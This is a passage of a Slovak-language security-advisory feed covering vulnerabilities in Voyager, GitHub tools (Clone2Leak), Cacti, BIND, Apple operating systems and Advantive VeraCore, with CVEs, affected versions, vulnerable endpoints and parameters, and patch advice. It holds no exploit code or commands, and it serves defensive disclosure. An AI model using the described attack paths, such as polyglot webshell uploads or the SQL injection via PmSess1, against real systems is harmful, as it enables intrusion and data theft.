<p><strong>CVE-2024-55417&nbsp; </strong>(CVSS skóre 8,8)</p>



<p>Zraniteľnosť v komponente pre nahrávanie súborov dostupnom prostredníctvom /admin/media/upload spočíva v nedostatočnom overovaní MIME typu nahrávaných súborov vo funkcii getMimeType. Vzdialený útočník by ju podvrhnutím špeciálne vytvorených súborov typu polyglot (interpretovateľných ako viacero typov súborov alebo obsahujúcich časti vytvorené vo viacerých programovacích jazykoch) mohol zneužiť <strong>na nahratie ľubovoľných súborov, vrátane PHP webshellov.</strong></p>



<p><strong>Pozn.: Vykonanie kódu vyžaduje oprávnenia úrovne </strong><strong>browse_media</strong><strong>, ktoré možno získať napr. zneužitím zraniteľnosti CVE-2024-55416</strong><strong>.</strong></p>



<p><strong>CVE-2024-55416&nbsp; </strong>(CVSS skóre 6,1)</p>



<p>CVE-2024-55416 spočíva v nedostatočnom overovaní používateľských vstupov v rámci komponentu /admin/compass. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>realizáciu reflektovaných XSS (Cross Site Scripting) útokov</strong>. Zneužitie zraniteľnosti vyžaduje interakciu zo strany autentifikovaných používateľov, ktorí musia kliknúť na špeciálne vytvorenú URL.</p>



<p><strong>CVE-2024-55415&nbsp; </strong>(CVSS skóre 7,5)</p>



<p>CVE-2024-55415 v komponente pre manažment súborov by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>modifikáciu súborových ciest, čítanie a zmazanie súborov na súborovom systéme</strong>. Neoprávnené zmazanie súborov kritických pre chod aplikácie môže viesť k <strong>zneprístupneniu služby</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Únik&nbsp;citlivých údajov</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Na uvedené zraniteľnosti v súčasnosti nie sú dostupné bezpečnostné aktualizácie. Administrátorom odporúčame sledovať stránku výrobcu a&nbsp;po vydaní záplat vykonať bezodkladnú aktualizáciu zraniteľných systémov. Do vydania aktualizácií odporúčame uvedený balík nepoužívať alebo použiť alternatívny produkt bez známych bezpečnostných zraniteľností.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/">https://www.sonarsource.com/blog/the-tainted-voyage-uncovering-voyagers-vulnerabilities/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/laravel-admin-package-voyager-vulnerable-to-one-click-rce-flaw/">https://www.bleepingcomputer.com/news/security/laravel-admin-package-voyager-vulnerable-to-one-click-rce-flaw/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1998/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v nástrojoch platformy GitHub možno zneužiť na získanie autentifikačných údajov</title>
		<link>/posts/1995</link>
					<comments>/posts/1995#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:43:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[GitHub]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=1995</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/GitHub-Logo-1024x576.png" alt="" /></p>Vývojári platformy GitHub vydali bezpečnostné aktualizácie svojich produktov GitHub Desktop, Git LFS, GitHub CLI/Codespaces a Git Credential Manager, ktoré opravujú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/GitHub-Logo-1024x576.png" alt="" /></p>
<p><strong>Vývojári platformy GitHub vydali bezpečnostné aktualizácie svojich produktov GitHub Desktop, Git LFS, GitHub CLI/Codespaces a Git Credential Manager, ktoré opravujú 4 zraniteľnosti, z&nbsp;čoho 2 sú označené ako vysoko závažné. Zraniteľnosti súhrnne označené ako „Clone2Leak“ možno zneužiť na získanie neoprávneného prístupu k&nbsp;prihlasovacím údajom a&nbsp;autentifikačným tokenom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GitHub Desktop vo verziách 3.3.15 a&nbsp;starších</li>



<li>Git Credential Manager vo verziách 2.6.0 a starších</li>



<li>Git LFS vo verziách 0.1.0 až 3.6.0</li>



<li>Git CLI vo verziách 2.62.0 a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>GitHub Desktop:</u></strong></p>



<p><strong>CVE-2025-23040 </strong>(CVSS skóre 6,6)</p>



<p>GitHub Desktop pri iniciácii klonovania repozitára na pozadí volá príkaz „git clone“, ktorý si pri klonovaní vzdialeného repozitára vyžadujúceho autentifikáciu od aplikácie vypýta prihlasovacie údaje prostredníctvom protokolu „git-credential“. Podvrhnutím špeciálne vytvorenej URL adresy je zraniteľnosť možné zneužiť na <strong>získanie uložených prihlasovacích údajov a&nbsp;OAuth tokenov</strong> uložených v&nbsp;aplikácii.</p>



<p><strong><u>Git Credential Manager:</u></strong></p>



<p><strong>CVE-2024-50338 </strong>(CVSS skóre 7,4)</p>



<p>Zraniteľnosť spočíva v&nbsp;nesúlade spracovania špeciálnych znakov pre ukončenie riadku medzi Git a&nbsp;Git Credential Manager a&nbsp;vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorenej URL adresy mohol zneužiť na <strong>získanie uložených prihlasovacích údajov</strong>.</p>



<p><strong><u>Git LFS:</u></strong></p>



<p><strong>CVE-2024-53263 </strong>(CVSS skóre 8,5)</p>



<p>Zraniteľnosť spočíva v&nbsp;nesprávnom spracovaní častí URL spracovávaných v&nbsp;rámci „git-credential“ a&nbsp;podvrhnutím špeciálne vytvorenej URL obsahujúcej znaky pre ukončenie riadka (LF – Line Feed, CR – Carriage Return) ju možno zneužiť na <strong>získanie prihlasovacích údajov</strong>.</p>



<p><strong><u>Git CLI:</u></strong></p>



<p><strong>CVE-2024-53858 </strong>(CVSS skóre 6,5)</p>



<p>Zraniteľnosť v&nbsp;Github CLI (Command Line Interface) pri klonovaní repozitárov obsahujúcich git submoduly hostované mimo domén github.com a&nbsp;ghe.com umožňuje <strong>neoprávnený prístup k&nbsp;autentifikačným tokenom</strong>.</p>



<p><strong>Pozn.: Zneužitie všetkých zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí spustiť klonovanie obsahu (</strong><strong>git clone</strong><strong>) alebo vykonať interakciu so škodlivým repozitárom pod kontrolou útočníka.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame vykonať aktualizáciu produktov GitHub Desktop na verziu 3.4.12, Git Credential Manager na verziu 2.6.1, Git LFS na verziu 3.6.1 a Git CLI na verziu 2.63.0.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://github.com/desktop/desktop/security/advisories/GHSA-36mm-rh9q-cpqq">https://github.com/desktop/desktop/security/advisories/GHSA-36mm-rh9q-cpqq</a></li>



<li><a href="https://github.com/git-ecosystem/git-credential-manager/security/advisories/GHSA-86c2-4x57-wc8g">https://github.com/git-ecosystem/git-credential-manager/security/advisories/GHSA-86c2-4&#215;57-wc8g</a></li>



<li><a href="https://github.com/git-lfs/git-lfs/security/advisories/GHSA-q6r2-x2cc-vrp7">https://github.com/git-lfs/git-lfs/security/advisories/GHSA-q6r2-x2cc-vrp7</a></li>



<li><a href="https://github.com/cli/cli/security/advisories/GHSA-jwcm-9g39-pmcw">https://github.com/cli/cli/security/advisories/GHSA-jwcm-9g39-pmcw</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/clone2leak-attacks-exploit-git-flaws-to-steal-credentials/">https://www.bleepingcomputer.com/news/security/clone2leak-attacks-exploit-git-flaws-to-steal-credentials/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1995/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť monitorovacieho a manažmentového frameworku Cacti</title>
		<link>/posts/1991</link>
					<comments>/posts/1991#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:40:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cacti]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1991</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/cacti.jpg" alt="" /></p>Vývojári open-source monitorovacieho a manažmentového frameworku Cacti vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve zraniteľnosti, z čoho jedna je...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/cacti.jpg" alt="" /></p>
<p><strong>Vývojári open-source monitorovacieho a manažmentového frameworku Cacti vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve zraniteľnosti, z čoho jedna je označená ako kritická. Kritickú zraniteľnosť s&nbsp;označením CVE-2025-22604 možno zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cacti vo verziách starších ako 1.2.29</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-22604&nbsp; </strong>(CVSS skóre 9,1)</p>



<p>Kritická zraniteľnosť spočíva v nesprávnom parsovaní viacriadkových výsledkov SNMP v&nbsp;rámci funkcií <em>ss_net_snmp_disk_io()</em> a <em>ss_net_snmp_disk_bytes()</em>. Vzdialený autentifikovaný útočník by ju podvrhnutím špeciálne vytvorených identifikátorov objektov (OID) mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>CVE-2025-24367&nbsp; </strong>(CVSS skóre 8,7)</p>



<p>CVE-2025-24367 vo funkcionalitách pre prácu s&nbsp;grafmi spočívajúcu v&nbsp;nesprávnom spracovaní znakov pre ukončenie riadka by vzdialený autentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu. Umožňuje mu vytvárať PHP skripty v&nbsp;koreňovom priečinku aplikácie.</p>



<p><strong>Pozn.: Na uvedenú zraniteľnosť je v&nbsp;súčasnosti dostupný Proof of Concept kód demonštrujúci postup jej zneužitia.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu inštancií Cacti na verziu 1.2.29.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-c5j8-jxj3-hh36">https://github.com/Cacti/cacti/security/advisories/GHSA-c5j8-jxj3-hh36</a></li>



<li><a href="https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq">https://github.com/Cacti/cacti/security/advisories/GHSA-fxrq-fr7h-9rqq</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-22604">https://www.cve.org/CVERecord?id=CVE-2025-22604</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-24367">https://www.cve.org/CVERecord?id=CVE-2025-24367</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1991/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažné zraniteľnosti v DNS systéme BIND možno zneužiť na zneprístupnenie služby</title>
		<link>/posts/1988</link>
					<comments>/posts/1988#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:38:37 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[BIND]]></category>
		<category><![CDATA[DoS]]></category>
		<guid isPermaLink="false">/?p=1988</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/Bind_9_ISC_Blue_320x320.png" alt="" /></p>Vývojári DNS systému BIND vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve vysoko závažné zraniteľnosti. CVE-2024-12705 a CVE-2024-11187 možno zneužiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/Bind_9_ISC_Blue_320x320.png" alt="" /></p>
<p><strong>Vývojári DNS systému BIND vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú dve vysoko závažné zraniteľnosti. CVE-2024-12705 a CVE-2024-11187 možno zneužiť na zahltenie dostupných prostriedkov a&nbsp;zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>BIND vo verziách od 9.11.0 do 9.11.37 (vrátane)</li>



<li>BIND vo verziách od 9.16.0 do 9.16.50 (vrátane)</li>



<li>BIND vo verziách od 9.18.0 do 9.18.32 (vrátane)</li>



<li>BIND vo verziách od 9.20.0 do 9.20.4 (vrátane)</li>



<li>BIND vo verziách od 9.21.0 do 9.21.3 (vrátane)</li>



<li>BIND Supported Preview Edition vo verziách od 9.11.3-S1 do 9.11.37-S1 (vrátane)</li>



<li>BIND Supported Preview Edition vo verziách od 9.16.8-S1 do 9.16.50-S1 (vrátane)</li>



<li>BIND Supported Preview Edition vo verziách od 9.18.11-S1 do 9.18.32-S1 (vrátane)</li>
</ul>



<p><em>Pozn.: Prítomnosť zraniteľností nebola preverovaná v&nbsp;rámci BIND vo verziách starších ako 9.11.37 a BIND Supported Preview Edition vo verziách starších ako 9.11.37-S1 (</em><em>CVE-2024-11187) a 9.18.27 a BIND Supported Preview Edition vo verziách starších ako 9.18.27-S1 (</em><em>CVE-2024-12705) .</em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-12705&nbsp; </strong>(CVSS skóre 7,5)</p>



<p>Zraniteľnosť by vzdialený neautorizovaný útočník zaplavením resolvera veľkým objemom HTTP/2 prevádzky mohol zneužiť na <strong>zahltenie dostupných prostriedkov</strong> (procesor, operačná pamäť) a&nbsp;následné <strong>zneprístupnenie služby</strong> spočívajúce v nemožnosti vytvorenia nových DoH (DNS-over-HTTPS) spojení.</p>



<p><strong>Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách s&nbsp;aktivovaným DNS-over-HTTPS.</strong></p>



<p><strong>CVE-2024-11187&nbsp; </strong>(CVSS skóre 7,5)</p>



<p>Zaslaním bližšie nešpecifikovaných požiadaviek na špeciálne vytvorené zóny dochádza ku generovaniu odpovedí s veľkým množstvom záznamov v sekcii Additional, ktoré vedú k <strong>zahlteniu výpočtových prostriedkov</strong> autoritatívnych serverov a&nbsp;nezávislých resolverov a <strong>zneprístupneniu služby</strong>.</p>



<p><strong>Pozn.: Zneužitie zraniteľnosti je možné mitigovať nastavením „</strong><strong><em>minimal-responses yes;</em></strong><strong>“</strong><strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu BIND na verzie 9.18.33, 9.20.5 alebo 9.21.4 a BIND Supported Preview Edition na verziu 9.18.33-S1.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://kb.isc.org/docs/cve-2024-12705">https://kb.isc.org/docs/cve-2024-12705</a></li>



<li><a href="https://kb.isc.org/docs/cve-2024-11187">https://kb.isc.org/docs/cve-2024-11187</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1988/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické a aktívne zneužívaná zero-day zraniteľnosť v produktoch Apple</title>
		<link>/posts/1986</link>
					<comments>/posts/1986#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:36:20 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Spoofing]]></category>
		<guid isPermaLink="false">/?p=1986</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Spoločnosť APPLE vydala bezpečnostné aktualizácie, ktoré opravujú 69 bezpečnostných zraniteľností v operačných systémoch iOS, iPadOS, macOS, tvOS, watchOS a&#160;visionOS a&#160;webovom...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Spoločnosť APPLE vydala bezpečnostné aktualizácie, ktoré opravujú 69 bezpečnostných zraniteľností v operačných systémoch iOS, iPadOS, macOS, tvOS, watchOS a&nbsp;visionOS a&nbsp;webovom prehliadači Safari, z čoho 18 je označených ako kritických a 1 ako aktívne zneužívaná zero-day zraniteľnosť. Aktívne zneužívanú zero-day s&nbsp;označením CVE-2025-24085 možno zneužiť na eskaláciu privilégií na zariadeniach s tvOS, watchOS, macOS Sequoia, iOS, iPadOS a visionOS.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Safari vo verziách starších ako 18.3 (celkom 7 zraniteľností)</li>



<li>tvOS vo verziách starších ako 18.3 (celkom 17 zraniteľností)</li>



<li>watchOS vo verziách starších ako 11.3 (celkom 17 zraniteľností)</li>



<li>macOS Ventura vo verziách starších ako 13.7.3 (celkom 31 zraniteľností)</li>



<li>macOS Sonoma vo verziách starších ako 14.7.3 (celkom 41 zraniteľností)</li>



<li>macOS Sequoia vo verziách starších ako 15.3 (celkom 60 zraniteľností)</li>



<li>iPadOS 17.X vo verziách starších ako 17.7.4 (celkom 16 zraniteľností)</li>



<li>iOS vo verziách starších ako 18.3 (celkom 28 zraniteľností)</li>



<li>iPadOS 18.X vo verziách starších ako 18.3 (celkom 28 zraniteľností)</li>



<li>visionOS vo verziách starších ako 2.3 (celkom 20 zraniteľností)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-24093 </strong>(CVSS skóre 9,8)</p>



<p>Operačné systémy macOS Ventura a macOS Sonoma obsahujú zraniteľnosť v&nbsp;komponente Sandbox, ktorú možno zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;prenosným médiám</strong>.</p>



<p><strong>CVE-2025-24102 </strong>(CVSS skóre 9,8)</p>



<p>Komponent CoreRoutine v rámci macOS Ventura, macOS Sonoma, macOS Sequoia a iPadOS obsahuje zraniteľnosť umožňujúcu <strong>získanie polohy používateľa</strong>.</p>



<p><strong>CVE-2025-24106 </strong>(CVSS skóre 9,8)</p>



<p>macOS Ventura, macOS Sonoma a macOS Sequoia v&nbsp;komponente Audio obsahujú zraniteľnosť, ktorú možno podvrhnutím špeciálne vytvorených súborov zneužiť na <strong>zneprístupnenie služby</strong>.</p>



<p><strong>CVE-2025-24109 </strong>(CVSS skóre 9,8)</p>



<p>Zraniteľnosť v&nbsp;komponente AppleMobileFileIntegrity (macOS Ventura, macOS Sonoma a macOS Sequoia) spočíva v&nbsp;nedostatočnom overovaní digitálnych podpisov aplikácií a&nbsp;možno ju zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom používateľa</strong>.</p>



<p><strong>CVE-2025-24118 </strong>(CVSS skóre 9,8)</p>



<p>Jadro operačných systímov macOS Sonoma, macOS Sequoia a iPadOS obsahuje zraniteľnosť spočívajúcu v&nbsp;nesprávnom manažmente dostupnej operačnej pamäte a&nbsp;možno ju zneužiť na <strong>zneprístupnenie služby</strong> a&nbsp;<strong>zápis do kernel pamäte</strong>.</p>



<p><strong>CVE-2025-24123, CVE-2025-24124 </strong>(CVSS skóre 9,8)</p>



<p>Zraniteľnosti v&nbsp;komponente CoreMedia (tvOS, watchOS, macOS Ventura, macOS Sonoma, macOS Sequoia, iPadOS, iOS a visionOS) možno podvrhnutím špeciálne vytvoreného súboru zneužiť na <strong>zneprístupnenie služby</strong>.</p>



<p><strong>CVE-2025-24126 </strong>(CVSS skóre 9,8)</p>



<p>Funkcionalita AirPlay na zariadeniach s&nbsp;operačným systémom tvOS, watchOS, macOS Sequoia, iPadOS, iOS a visionOS obsahuje zraniteľnosť spočívajúcu v&nbsp;nesprávnom overovaní používateľských vstupov. Útočník nachádzajúci sa v&nbsp;lokálnej sieti by ju mohol zneužiť na <strong>poškodenie obsahu operačnej pamäte</strong> a&nbsp;<strong>zneprístupnenie služby</strong>.</p>



<p><strong>CVE-2025-24130 </strong>(CVSS skóre 9,8)</p>



<p>Operačné systémy macOS Ventura, macOS Sonoma a macOS Sequoia obsahujú zraniteľnosť v&nbsp;komponente PackageKit, ktorú možno zneužiť na <strong>modifikáciu chránených častí súborového systému zariadenia</strong>.</p>



<p><strong>CVE-2025-24131 </strong>(CVSS skóre 9,8)</p>



<p>Zraniteľnosť tvOS, watchOS, macOS Sequoia, iPadOS, iOS a visionOS (komponent AirPlay) spočíva v&nbsp;nesprávnom manažmente dostupnej operačnej pamäte a umožňuje <strong>zneprístupnenie služby</strong>.</p>



<p><strong>CVE-2025-24135 </strong>(CVSS skóre 9,8)</p>



<p>Nedostatočné overovanie správ v&nbsp;rámci komponentu System Extensions (macOS Sequoia) možno zneužiť na <strong>eskaláciu privilégií</strong>.</p>



<p><strong>CVE-2025-24139 </strong>(CVSS skóre 9,8)</p>



<p>Podvrhnutím špeciálne vytvorených súborov možno na macOS Ventura, macOS Sonoma a macOS Sequoia spôsobiť pád komponentu sips a&nbsp;následné <strong>zneprístupnenie služby</strong>.</p>



<p><strong>CVE-2025-24146 </strong>(CVSS skóre 9,8)</p>



<p>Nesprávne spracovanie citlivých údajov v&nbsp;rámci komponentu Photos Storage na zariadeniach s macOS Ventura, macOS Sonoma a macOS Sequoia má za následok prítomnosť citlivých údajov v&nbsp;systémových logoch, čo možno neužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>.</p>



<p><strong>CVE-2025-24151 </strong>(CVSS skóre 9,8)</p>



<p>Operačné systémy macOS Ventura, macOS Sonoma a macOS Sequoia obsahujú v&nbsp;komponente SMB zraniteľnosť umožňujúcu <strong>zneprístupnenie služby</strong> a&nbsp;<strong>poškodenie obsahu kernel pamäte</strong>.</p>



<p><strong>CVE-2025-24156 </strong>(CVSS skóre 9,8)</p>



<p><strong>Eskalácia privilégií</strong> na macOS Ventura, macOS Sonoma a macOS Sequoia je umožnená existenciou zraniteľnosti v&nbsp;komponente Xsan.</p>



<p><strong>CVE-2025-24163 </strong>(CVSS skóre 9,8)</p>



<p>Zraniteľnosť v&nbsp;komponente CoreAudio v&nbsp;rámci tvOS, watchOS, macOS Sonoma, macOS Sequoia, iPadOS, iOS a visionOS možno zneužiť na <strong>zneprístupnenie služby</strong>.</p>



<p><strong>CVE-2025-24169 </strong>(CVSS skóre 9,8)</p>



<p>Zraniteľnosť v&nbsp;komponente Passwords v Safari a macOS Sequoia spočíva v&nbsp;nedostatočnom ošetrení citlivých údajov v&nbsp;rámci logovania a možno ju zneužiť na <strong>obídenie mechanizmov autentifikácie v&nbsp;rámci rozšírení webového prehliadača</strong>.</p>



<p><strong>CVE-2025-24174 </strong>(CVSS skóre 9,8)</p>



<p>iCloud Photo Library v&nbsp;rámci macOS Ventura, macOS Sonoma a macOS Sequoia spočíva v&nbsp;nesprávnom overovaní nastavení ochrany súkromia a&nbsp;možno ju zneužiť na <strong>obídenie bezpečnostných mechanizmov</strong>.</p>



<p><strong>CVE-2025-24085 </strong>(CVSS skóre 7,8)</p>



<p>Aktívne zneužívaná zero-day zraniteľnosť v&nbsp;komponente Core Media používanom v&nbsp;rámci operačných systémov tvOS, watchOS, macOS Sequoia, iOS, iPadOS a&nbsp;visionOS spočíva v&nbsp;použití odalokovaného miesta v&nbsp;pamäti a&nbsp;podvrhnutím škodlivej aplikácie ju možno zneužiť na <strong>eskaláciu privilégií</strong>.</p>



<p><strong>Pozn.: Na základe informácií od spoločnosti Apple je zraniteľnosť CVE-2025-24085 v&nbsp;súčasnosti aktívne zneužívaná pri útokoch na zariadenia s&nbsp;operačným systémom iOC vo verziách starších ako 17.2.</strong></p>



<p><strong>Ostatné zraniteľnosti:</strong></p>



<p>Ostatné zraniteľnosti možno zneužiť na spôsobenie širokého spektra škôd špecifikovaných v&nbsp;časti „Možné škody“.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Injekcia príkazov</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Spoofing</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať aktualizáciu zraniteľných systémov na verzie iOS 18.3, iPadOS 18.3, macOS Sequoia 15.3, watchOS 11.3, visionOS 2.3, tvOS 18.3, alebo špecifikované na webstránkach výrobcu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.apple.com/en-us/122074">https://support.apple.com/en-us/122074</a></li>



<li><a href="https://support.apple.com/en-us/122072">https://support.apple.com/en-us/122072</a></li>



<li><a href="https://support.apple.com/en-us/122071">https://support.apple.com/en-us/122071</a></li>



<li><a href="https://support.apple.com/en-us/122070">https://support.apple.com/en-us/122070</a></li>



<li><a href="https://support.apple.com/en-us/122069">https://support.apple.com/en-us/122069</a></li>



<li><a href="https://support.apple.com/en-us/122068">https://support.apple.com/en-us/122068</a></li>



<li><a href="https://support.apple.com/en-us/122067">https://support.apple.com/en-us/122067</a></li>



<li><a href="https://support.apple.com/en-us/122066">https://support.apple.com/en-us/122066</a></li>



<li><a href="https://support.apple.com/en-us/122073">https://support.apple.com/en-us/122073</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-24085">https://nvd.nist.gov/vuln/detail/CVE-2025-24085</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/apple-fixes-this-years-first-actively-exploited-zero-day-bug/">https://www.bleepingcomputer.com/news/security/apple-fixes-this-years-first-actively-exploited-zero-day-bug/</a></li>



<li><a href="https://thehackernews.com/2025/01/apple-patches-actively-exploited-zero.html">https://thehackernews.com/2025/01/apple-patches-actively-exploited-zero.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1986/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero-day zraniteľnosti Advantive VeraCore</title>
		<link>/posts/1983</link>
					<comments>/posts/1983#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 11 Feb 2025 13:33:48 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Advantive VeraCore]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=1983</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/02/veracore_logo-1024x549-1.png" alt="" /></p>Advantive VeraCore obsahuje dve aktívne zneužívané zraniteľnosti, z&#160;ktorých jedna umožňuje nahrávanie súborov do ľubovoľného priečinku zraniteľnej aplikácie a&#160;druhá umožňuje získať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/02/veracore_logo-1024x549-1.png" alt="" /></p>
<p><strong>Advantive VeraCore obsahuje dve aktívne zneužívané zraniteľnosti, z&nbsp;ktorých jedna umožňuje nahrávanie súborov do ľubovoľného priečinku zraniteľnej aplikácie a&nbsp;druhá umožňuje získať kontrolu nad databázou. Útočníci zo skupiny XE Group zreťazujú tieto zraniteľnosti pre nasadenie webshellov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Advantive VeraCore 2025.1.0 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-57968</strong> (CVSS skóre 9,9)</p>



<p>Kritická zero-day zraniteľnosť Advantive VeraCore umožňuje vzdialeným autentifikovaným útočníkom útok typu path traversal a nahrávanie súborov do priečinkov, ktoré na to neboli určené. Zraniteľnosť súvisí s&nbsp;nedostatočným overovaním používateľských vstupov pri nahrávaní súborov komponentom /VeraCore/OMS/upload.aspx.</p>



<p><strong>CVE-2025-25181</strong> (CVSS skóre 5,8)</p>



<p>Zero-day zraniteľnosť v komponente <em>timeoutWarning.asp</em> umožňuje vzdialeným neautentifikovaným útočníkom zneužiť parameter <em>PmSess1</em> pre vykonávanie ľubovoľných príkazov SQL. Zraniteľnosť vyplýva z nedostatočnej sanitizácie používateľských vstupov, vstupujúcich do daného parametra. Umožňuje získať kontrolu nad zraniteľnou aplikáciou, čítať, meniť a mazať dáta v databáze.</p>



<p>Zraniteľnosti aktívne zneužíva skupina XE Group. Zreťazením týchto zraniteľností získavajú útočníci schopnosť nahrávať na zraniteľné systémy webshelly <em>ASPXSpy</em>, čo im umožňuje vytvoriť si zadné vrátka do systému. Prvé odhalené zneužitie CVE-2025-25181 sa datuje do roku 2020.</p>



<p><strong>Možné škody:</strong></p>



<ul>
